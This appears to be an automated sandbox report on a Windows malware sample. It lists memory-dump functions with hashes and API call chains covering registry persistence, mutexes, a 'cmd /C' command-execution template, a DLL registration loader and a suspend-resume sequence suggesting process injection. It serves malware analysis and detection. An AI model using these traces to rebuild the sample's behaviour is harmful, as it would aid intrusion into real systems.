    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
